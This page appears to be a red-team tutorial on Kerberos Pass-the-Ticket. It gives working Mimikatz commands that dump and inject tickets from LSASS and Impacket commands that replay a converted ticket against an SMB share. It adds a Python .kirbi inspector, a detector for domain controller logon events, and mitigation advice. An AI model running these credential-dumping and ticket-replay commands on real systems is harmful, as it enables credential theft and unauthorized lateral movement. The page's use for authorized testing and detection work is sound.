Conducting Pass-the-Ticket Attack

Pass-the-Ticket (PtT) is a lateral movement technique that uses stolen Kerberos tickets (TGT or TGS) to authenticate

What Is This

Conducting a Pass-the-Ticket (PtT) attack is a lateral movement technique used in red teaming and adversary simulation. It abuses the Kerberos authentication protocol that Windows Active Directory domains rely on. Instead of stealing or cracking a user's password, the attacker extracts valid Kerberos tickets, either a Ticket Granting Ticket (TGT) or a service ticket (TGS), from the memory of a compromised host. The stolen ticket is then injected into another logon session, on the same host or a different one, and the attacker can authenticate to network resources as the ticket's owner for as long as the ticket remains valid, without ever learning the password.

This skill is essential for demonstrating how real-world attackers move laterally within compromised networks and for testing the effectiveness of defensive controls against such attacks.

Why Use It

Pass-the-Ticket attacks are particularly valuable during penetration testing and red team engagements because they mimic tactics used by advanced persistent threats (APTs). The reasons for using this technique include:

  • Bypassing Credential Requirements: Attackers do not need to know or crack the user's password once they have the Kerberos ticket.
  • Evasion of Detection: Since the attacker is using legitimate authentication tokens, their activity often blends in with normal user behavior, making it harder to detect.
  • Privilege Escalation: If high-privilege tickets (such as those belonging to domain admins) are obtained, attackers can access sensitive systems and data.
  • Testing Defensive Capabilities: Security teams can evaluate how well their monitoring and detection tools can identify and respond to PtT attacks.

How to Use It

The process involves several steps and requires a foothold on a compromised Windows host plus specific tooling. Reading other users' tickets out of LSASS needs local administrator rights (SeDebugPrivilege); a user's own tickets can be exported from an unprivileged session. Below is a typical workflow using Mimikatz on the Windows side and Impacket on the attacker's Linux host.

1. Extracting Kerberos Tickets

The first step is to extract tickets from the Local Security Authority Subsystem Service (LSASS) memory on a compromised Windows machine. Mimikatz is a widely used tool for this purpose.

Example: Extracting Tickets with Mimikatz

Open an elevated command prompt on the compromised host and run:

mimikatz.exe

Within the Mimikatz shell, execute:

privilege::debug
sekurlsa::tickets

sekurlsa::tickets reads LSASS and lists the Kerberos tickets of every logon session on the host, which is why privilege::debug (and therefore an elevated prompt) is required. To write them to disk:

sekurlsa::tickets /export

Each ticket is saved as a .kirbi file (a DER-encoded KRB-CRED message) named after the logon ID, the client and the service. From an unprivileged session, only the current user's own tickets can be exported, through the normal Kerberos API and without debug privilege:

kerberos::list /export

2. Injecting Tickets into a New Session

After extracting the ticket, the attacker can inject it into their own session (either locally or on a different machine where they have access).

Example: Injecting a Ticket with Mimikatz

Copy the .kirbi file to the attacker’s machine and run:

mimikatz.exe

Then execute:

kerberos::ptt <path-to-ticket.kirbi>

kerberos::ptt writes the ticket into the Kerberos cache of the current logon session; it does not need privilege::debug, and a directory path injects every .kirbi found in it. Confirm the injection with the built-in klist command, which should now list the ticket's client and server names. From then on, anything in that session that authenticates with Kerberos (net use, dir \\server\share, PowerShell remoting) does so as the ticket's owner.

3. Accessing Network Resources

With the ticket injected, the attacker can access services such as file shares, databases, or remote desktop sessions as the impersonated user. What is reachable depends on the ticket type: a TGT lets the session request a service ticket for any SPN, whereas a single service ticket only grants access to the one service (SPN) it was issued for.

Example: Using Impacket's smbclient

On a Linux attack host, first convert the .kirbi into the MIT ccache format that Impacket and the system Kerberos libraries use (ticketConverter.py in the Impacket repository, packaged as impacket-ticketConverter on Kali), then point KRB5CCNAME at the cache. The domain, user and host names below are example values:

impacket-ticketConverter alice.kirbi alice.ccache
export KRB5CCNAME=/tmp/alice.ccache
klist
impacket-smbclient -k -no-pass CORP.LOCAL/alice@fileserver.corp.local

-k tells Impacket to authenticate with Kerberos using the cache named by KRB5CCNAME, and -no-pass suppresses the password prompt. The target must be the host name that appears in the ticket's SPN (here cifs/fileserver.corp.local), not an IP address: there is no Kerberos ticket for an IP, so an IP target fails. If the cache holds a TGT rather than a service ticket, Impacket requests the service ticket itself, so the KDC must be reachable (add -dc-ip <dc-address> if the realm does not resolve).
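Before injecting a ticket it is worth checking who it belongs to, which SPN it was issued for, and when it expires, since those three values decide which target name to use with -k and whether the ticket is still usable at all. The script below is an added example and is not code from this page, from Mimikatz or from Impacket: it decodes a Mimikatz-style .kirbi (a DER-encoded KRB-CRED whose enc-part uses etype 0, so the KrbCredInfo is in the clear) with a small generic DER reader. The sample ticket, realm CORP.LOCAL, user alice and SPN cifs/fileserver.corp.local are constructed inline so the script runs offline; the DER encoders at the top exist only to build that sample.

```python
"""Inspect a mimikatz-style .kirbi (DER KRB-CRED) before passing it.
Added example, not code from the page, mimikatz or Impacket.  The enc-part of
an exported KRB-CRED uses etype 0 (no encryption), so client, service SPN,
session key and expiry are readable without any key.  The sample ticket is
constructed inline; the DER encoders below exist only to build it."""
import datetime as dt

# -- minimal DER encoders (only used to build the constructed sample) --
def der(tag, body):
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    elif n < 0x100:
        length = b"\x81" + bytes([n])
    else:
        length = b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + body

def ctx(n, body): return der(0xA0 | n, body)          # context-specific [n]
def app(n, body): return der(0x60 | n, body)          # [APPLICATION n]
def seq(*items): return der(0x30, b"".join(items))
def integer(v): return der(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))
def gstr(s): return der(0x1B, s.encode())             # KerberosString = GeneralString
def gtime(t): return der(0x18, t.strftime("%Y%m%d%H%M%SZ").encode())  # KerberosTime
def principal(name_type, *parts):                     # 1 = NT-PRINCIPAL, 2 = NT-SRV-INST
    return seq(ctx(0, integer(name_type)), ctx(1, seq(*[gstr(p) for p in parts])))
def encrypted_data(etype, cipher):
    return seq(ctx(0, integer(etype)), ctx(2, der(0x04, cipher)))

# -- constructed sample: a CIFS service ticket for alice with a 10h lifetime --
SAMPLE_REALM, SAMPLE_USER, SAMPLE_SPN = "CORP.LOCAL", "alice", ("cifs", "fileserver.corp.local")
SAMPLE_START = dt.datetime(2024, 5, 1, 8, 0, 0, tzinfo=dt.timezone.utc)
SAMPLE_END = SAMPLE_START + dt.timedelta(hours=10)

def build_sample_kirbi():
    ticket = app(1, seq(ctx(0, integer(5)), ctx(1, gstr(SAMPLE_REALM)),
                        ctx(2, principal(2, *SAMPLE_SPN)),
                        ctx(3, encrypted_data(18, b"\xAA" * 48))))   # opaque, service-key encrypted
    info = seq(ctx(0, seq(ctx(0, integer(18)), ctx(1, der(0x04, b"\x11" * 32)))),  # session key
               ctx(1, gstr(SAMPLE_REALM)), ctx(2, principal(1, SAMPLE_USER)),
               ctx(5, gtime(SAMPLE_START)), ctx(6, gtime(SAMPLE_END)),
               ctx(7, gtime(SAMPLE_START + dt.timedelta(days=7))),
               ctx(8, gstr(SAMPLE_REALM)), ctx(9, principal(2, *SAMPLE_SPN)))
    cred_part = app(29, seq(ctx(0, seq(info))))                       # EncKrbCredPart, cleartext
    return app(22, seq(ctx(0, integer(5)), ctx(1, integer(22)), ctx(2, seq(ticket)),
                       ctx(3, encrypted_data(0, cred_part))))         # KRB-CRED, etype 0

# -- generic DER reader and KRB-CRED navigation --
def parse(buf, pos=0):
    """Decode one TLV; returns ((tag, children or bytes), next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                  # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    body, pos = buf[pos:pos + length], pos + length
    if not tag & 0x20:                                 # primitive
        return (tag, body), pos
    kids, p = [], 0
    while p < len(body):
        node, p = parse(body, p)
        kids.append(node)
    return (tag, kids), pos

def fields(node):
    """Map field number -> inner node for a SEQUENCE of [n]-tagged members."""
    assert node[0] == 0x30, "expected SEQUENCE"
    return {tag & 0x1F: kids[0] for tag, kids in node[1]}

def principal_str(node):
    return "/".join(part.decode() for _, part in fields(node)[1][1])

def krb_time(node):
    return dt.datetime.strptime(node[1].decode(), "%Y%m%d%H%M%SZ").replace(tzinfo=dt.timezone.utc)

def inspect_kirbi(data, now=None):
    """Summarise the first credential in a KRB-CRED."""
    if now is None:
        now = dt.datetime.now(dt.timezone.utc)
    krb_cred, _ = parse(data)
    assert krb_cred[0] == 0x76, "not a KRB-CRED ([APPLICATION 22])"
    top = fields(krb_cred[1][0])
    enc = fields(top[3])
    etype = int.from_bytes(enc[0][1], "big")
    if etype != 0:
        raise ValueError(f"enc-part etype {etype}: KrbCredInfo is encrypted, not a plain .kirbi")
    cred_part, _ = parse(enc[2][1])                    # [APPLICATION 29] EncKrbCredPart
    info = fields(fields(cred_part[1][0])[0][1][0])    # first KrbCredInfo
    service, end = principal_str(info[9]), krb_time(info[6])
    return {
        "client": f"{principal_str(info[2])}@{info[1][1].decode()}",
        "service": f"{service}@{info[8][1].decode()}",
        "target_host": service.split("/", 1)[1],       # the name -k must be pointed at
        "key_etype": int.from_bytes(fields(info[0])[0][1], "big"),
        "end_time": end,
        "expired": now >= end,
        "tickets": len(top[2][1]),
    }

if __name__ == "__main__":
    for key, value in inspect_kirbi(build_sample_kirbi()).items():
        print(f"{key:12} {value}")
```

To run it against a real export, replace build_sample_kirbi() with open("ticket.kirbi", "rb").read(). The target_host value is the name to pass to Impacket with -k; the expired flag is what the "Ticket Lifespan" note warns about, and a session key etype of 23 (RC4) on a ticket for an AES-only account is one of the tells defenders look for.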

When to Use It

  • Red Team Engagements: When simulating real-world adversary behavior in environments that use Kerberos for authentication.
  • Post-Exploitation: After initial access has been gained and elevated privileges are required to move laterally or escalate privileges.
  • Incident Response: For understanding the impact of a breach and how attackers may have moved through the environment.
  • Security Control Validation: To assess whether existing controls can detect or mitigate PtT attacks.

Important Notes

  • Authorization Is Mandatory: Only use PtT techniques in environments you own or have explicit written permission to test. Unauthorized use is illegal and unethical.
  • Detection and Forensics: PtT is stealthy because it replays genuine authentication artifacts. On the domain controllers, look for 4769 (service ticket requested) events for a user from a source address that never produced a matching 4768 (TGT requested), for the same account active from two hosts within one ticket lifetime, and for encryption-type downgrades (RC4, 0x17, where AES is expected). On endpoints, watch for processes opening a handle to LSASS (the extraction step) and for 4624 logon type 3 events with the Kerberos authentication package from unexpected sources. A stolen service ticket never touches the DC, so the target host's logon events are the only record of its use.
  • Ticket Lifespan: Kerberos tickets have a limited lifetime. Attackers must act before the ticket expires or obtain a new ticket.
  • Mitigation Techniques: Place privileged accounts in the Protected Users group (no RC4, shorter non-renewable TGTs, no credential caching), enforce least privilege so that a single compromised workstation never holds domain admin tickets, enable Windows Defender Credential Guard so that the TGT and its session key are no longer readable from LSASS memory, run LSASS as a protected process (RunAsPPL), and alert on tools that open LSASS.
  • Tool Use: Mimikatz and Impacket are powerful tools often flagged by security software. Their use should be carefully controlled and monitored.
  • Legal Compliance: Always follow legal and organizational policies regarding penetration testing and red teaming.
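The detection heuristic from the "Detection and Forensics" note, run over sample domain-controller events, as an added example that is not part of the original page. It consumes the fields a SIEM would extract from Security events 4768 (TGT requested) and 4769 (service ticket requested) and raises an alert when a host presents a TGT for a user that this KDC never issued to that host, or when a service that has been issuing AES tickets suddenly issues an RC4 one (the requester only offered RC4, which Windows clients do not do). The event records are constructed, the field names follow the Windows event XML, and the 10-hour TGT lifetime is the default domain policy and an assumption here.

```python
"""Flag service-ticket requests that look like Pass-the-Ticket with a stolen TGT.
Added example, not part of the original page.  Input: fields a SIEM would pull
from DC Security events 4768 (TGT requested) and 4769 (service ticket requested).
The sample events are constructed; TGT_LIFETIME is the default policy (assumed)."""
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)      # assumed: default "Maximum lifetime for user ticket"
RC4_HMAC, AES256 = 0x17, 0x12           # TicketEncryptionType values seen in 4768/4769

# Constructed sample: alice and bob log on from their workstations; alice's TGT
# is then replayed from 10.0.9.77, a host this DC never issued a TGT to.
EVENTS = [
    {"SystemTime": "2024-05-01T08:00:05Z", "EventID": 4768, "TargetUserName": "alice",
     "IpAddress": "::ffff:10.0.1.25", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
    {"SystemTime": "2024-05-01T08:00:07Z", "EventID": 4769, "TargetUserName": "alice@CORP.LOCAL",
     "IpAddress": "::ffff:10.0.1.25", "ServiceName": "fileserver$", "TicketEncryptionType": "0x12"},
    {"SystemTime": "2024-05-01T09:35:00Z", "EventID": 4768, "TargetUserName": "bob",
     "IpAddress": "::ffff:10.0.1.30", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
    {"SystemTime": "2024-05-01T09:36:00Z", "EventID": 4769, "TargetUserName": "bob@CORP.LOCAL",
     "IpAddress": "::ffff:10.0.1.30", "ServiceName": "fileserver$", "TicketEncryptionType": "0x12"},
    {"SystemTime": "2024-05-01T09:40:00Z", "EventID": 4769, "TargetUserName": "alice@CORP.LOCAL",
     "IpAddress": "::ffff:10.0.9.77", "ServiceName": "dc01$", "TicketEncryptionType": "0x12"},
    {"SystemTime": "2024-05-01T09:41:00Z", "EventID": 4769, "TargetUserName": "alice@CORP.LOCAL",
     "IpAddress": "::ffff:10.0.9.77", "ServiceName": "fileserver$", "TicketEncryptionType": "0x17"},
]

def norm_user(name):
    return name.split("@", 1)[0].lower()      # 4769 carries user@REALM, 4768 just the user

def norm_ip(addr):
    return addr[7:] if addr.startswith("::ffff:") else addr   # strip IPv4-mapped prefix

def find_pass_the_ticket(events, tgt_lifetime=TGT_LIFETIME):
    """Return one alert per suspicious 4769; the input need not be sorted."""
    events = sorted(events, key=lambda e: e["SystemTime"])
    last_tgt = {}            # (user, ip) -> time of the latest 4768 from that host
    aes_services = set()     # services that have been issued AES service tickets
    alerts = []
    for e in events:
        t = datetime.strptime(e["SystemTime"], "%Y-%m-%dT%H:%M:%SZ")
        user, ip = norm_user(e["TargetUserName"]), norm_ip(e["IpAddress"])
        etype, service = int(e["TicketEncryptionType"], 16), e["ServiceName"]
        if e["EventID"] == 4768:
            last_tgt[(user, ip)] = t
            continue
        if e["EventID"] != 4769:
            continue
        reasons = []
        issued = last_tgt.get((user, ip))
        if issued is None or t - issued > tgt_lifetime:
            reasons.append("TGS-REQ from a host this KDC never issued a TGT to for this user")
        if etype == RC4_HMAC and service in aes_services:
            reasons.append("RC4 ticket for a service that normally gets AES (requester offered only RC4)")
        if etype == AES256:
            aes_services.add(service)
        if reasons:
            alerts.append({"time": e["SystemTime"], "user": user, "source_ip": ip,
                           "service": service, "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in find_pass_the_ticket(EVENTS):
        print(f'{a["time"]} {a["user"]} from {a["source_ip"]} -> {a["service"]}: '
              + "; ".join(a["reasons"]))
```

Two caveats when running this on real logs: the 4768 may have been logged by a different domain controller than the 4769, so the events from every DC have to be merged first, and a TGT that was renewed (event 4770) rather than re-requested is not modelled here and would look like a stale TGT after the lifetime window.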

By mastering the skill of conducting Pass-the-Ticket attacks, security professionals can better understand attacker methodologies and improve the security posture of their own or their clients' environments.